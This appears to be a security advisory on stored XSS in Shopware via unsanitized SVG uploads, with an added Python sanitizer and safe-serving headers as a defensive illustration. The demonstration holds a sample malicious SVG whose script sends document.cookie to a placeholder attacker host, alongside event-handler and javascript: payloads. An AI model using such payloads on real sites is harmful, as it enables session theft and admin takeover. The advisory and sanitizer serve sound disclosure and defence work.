Shopware: Stored XSS via SVG file upload — no SVG sanitization
Description
SVG files are in the allowed_extensions whitelist and can be uploaded by any admin user via the media manager. There is zero SVG content sanitization anywhere in the upload pipeline. A malicious SVG with JavaScript (`onload` handlers, `<script>` tags) executes in the context of the Shopware domain when accessed.
The Problem
In src/Core/Framework/Resources/config/packages/shopware.yaml, line 194:
allowed_extensions: ["jpg", "jpeg", "png", "webp", "avif", "gif", "svg", ...]
SVG is whitelisted. The upload path (MediaUploadController → FileSaver → TypeDetector) recognizes SVG as ImageType with VECTOR_GRAPHIC flag, but no code strips JavaScript, event handlers, or external entity references from the SVG XML.
A search of the entire codebase for SVG sanitization returns nothing: no DOMPurify, no svg-sanitize, no strip_tags on SVG content.
Impact
Stored XSS affecting all users who view the uploaded SVG. In an e-commerce context, this can lead to admin account takeover, customer data theft, or malicious plugin installation.
Suggested Fix
Either:
- **Remove SVG from allowed_extensions** if SVG upload is not a core requirement
- Sanitize SVG content on upload using a library like enshrined/svg-sanitize (strips scripts, event handlers, external references)
- **Serve SVGs with Content-Disposition: attachment** to prevent inline rendering
- Serve SVGs from a separate domain (like Nextcloud's usercontent.apps.nextcloud.com)
Option 2 is the most practical — enshrined/svg-sanitize is already used by WordPress and other PHP projects.
Regards & BG, Keyvan Hardani
Affected products (1)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
Root cause
"SVG files are not sanitized for malicious JavaScript content during upload."
Attack vector
An attacker uploads a malicious SVG file containing JavaScript, such as `onload` handlers or `<script>` tags, through the media manager. The application whitelists SVG files and does not perform any sanitization on their content [ref_id=1]. When another user accesses this uploaded SVG, the JavaScript executes within the context of the Shopware domain [ref_id=2].
Affected code
The vulnerability lies in the `allowed_extensions` configuration within `src/Core/Framework/Resources/config/packages/shopware.yaml`, which includes SVG. The upload pipeline, involving `MediaUploadController`, `FileSaver`, and `TypeDetector`, recognizes SVG as an image type but fails to strip JavaScript or other malicious elements from the XML content [ref_id=1, ref_id=2].
What the fix does
The advisory suggests several remediation strategies, as no specific patch is provided. These include removing SVG from the list of allowed extensions if not essential, sanitizing SVG content on upload using a library like `enshrined/svg-sanitize` to strip scripts and event handlers, serving SVGs with a `Content-Disposition: attachment` header to prevent inline rendering, or serving SVGs from a separate domain [ref_id=1, ref_id=2].
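The block below is an added example, not code from Shopware, from the report's author, or from the enshrined/svg-sanitize library. It sketches in Python what the two remediation options named above (sanitize on upload; serve with `Content-Disposition: attachment`) actually do, and runs them against a constructed payload of the kind the report describes (an `onload` handler, a `<script>` element, a `javascript:` link and external references). The function names, the element and attribute lists, and the host `attacker.example` are assumptions for illustration only.

```python
"""Minimal SVG upload sanitizer and safe-serving headers (illustrative example,
not Shopware code and not the enshrined/svg-sanitize library)."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed foreign (HTML) content; dropped with their subtree.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# CSS that loads remote resources or (in old engines) runs code; url(#local) stays allowed.
DANGEROUS_CSS = re.compile(r"""url\s*\(\s*['"]?\s*(?!#)|@import|expression\s*\(|javascript:""", re.I)


def _local(qname: str) -> str:
    """'{namespace}name' -> 'name'."""
    return qname.rsplit("}", 1)[-1]


def _clean(elem: ET.Element, findings: list) -> None:
    """Recursively strip dangerous elements, event handlers, hrefs and CSS in place."""
    for child in list(elem):
        if _local(child.tag) in FORBIDDEN_ELEMENTS:
            findings.append(f"removed <{_local(child.tag)}> element")
            elem.remove(child)
        else:
            _clean(child, findings)
    if _local(elem.tag) == "style" and elem.text and DANGEROUS_CSS.search(elem.text):
        findings.append("emptied <style> with external/active CSS")
        elem.text = ""
    for name, value in list(elem.attrib.items()):
        local = _local(name).lower()
        if local.startswith("on"):                      # onload, onclick, onerror, ...
            findings.append(f"removed event handler {local}")
            del elem.attrib[name]
        elif local in ("href", "src") and not value.strip().startswith("#"):
            findings.append(f"removed non-fragment {local}={value!r}")  # javascript:, http(s):, data:
            del elem.attrib[name]
        elif local == "style" and DANGEROUS_CSS.search(value):
            findings.append("removed style attribute with external/active CSS")
            del elem.attrib[name]


def sanitize_svg(data: str) -> tuple[str, list]:
    """Return (sanitized SVG text, list of findings). Raises ValueError for
    documents that must be rejected outright rather than cleaned."""
    # Refuse DOCTYPE/ENTITY declarations before any parser sees them (XXE, billion laughs).
    if re.search(r"<!DOCTYPE|<!ENTITY", data, re.I):
        raise ValueError("DOCTYPE/ENTITY declarations are not allowed")
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    findings: list = []
    _clean(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


def is_acceptable_upload(data: str) -> bool:
    """Upload gate: True only for well-formed SVG that is clean without modification."""
    try:
        _, findings = sanitize_svg(data)
    except (ValueError, ET.ParseError):
        return False
    return not findings


def attachment_headers(filename: str) -> dict:
    """Response headers for the 'Content-Disposition: attachment' mitigation:
    the browser downloads the file instead of rendering it as a document in
    the site's origin, so nothing inside it can run as the site."""
    safe_name = re.sub(r"[^\w.-]", "_", filename)   # keep quotes/CRLF out of the header
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        # Defence in depth if something still renders the file inline.
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'",
    }


# Constructed sample upload; attacker.example is a placeholder host.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(document.domain)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><rect width="100" height="100" fill="red"/></a>
  <image xlink:href="https://attacker.example/track.png" width="10" height="10"/>
  <use xlink:href="#shape"/>
  <circle id="shape" cx="50" cy="50" r="20" style="fill:url(https://attacker.example/x)"/>
</svg>"""

if __name__ == "__main__":
    clean, findings = sanitize_svg(MALICIOUS_SVG)
    print("\n".join(findings))
    print(clean)
    print(attachment_headers("logo.svg"))
```

Two practical notes. First, the script only fires when the SVG is opened as a document (navigating to the media URL, or embedding it via `<iframe>`/`<object>`); an `<img src="...svg">` reference does not execute script, which is why the "attachment" header alone closes the stored-XSS path without breaking thumbnails. Second, an upload gate has to decide between rejecting a file that produces findings (`is_acceptable_upload`) and storing the cleaned output; rejecting is the safer default for an admin-facing media manager because a silently rewritten logo is hard to debug. In PHP the library the report recommends exposes the same operation as `enshrined\svgSanitize\Sanitizer::sanitize()`.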
Preconditions
- auth: The attacker must have admin user privileges to access the media manager and upload files.
- input: The attacker must craft a malicious SVG file containing executable JavaScript.
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (4)
News mentions (1)
- Shopware: Nine Vulnerabilities Disclosed, Including Privilege Escalation and XSS (Vypr Intelligence, Jun 4, 2026)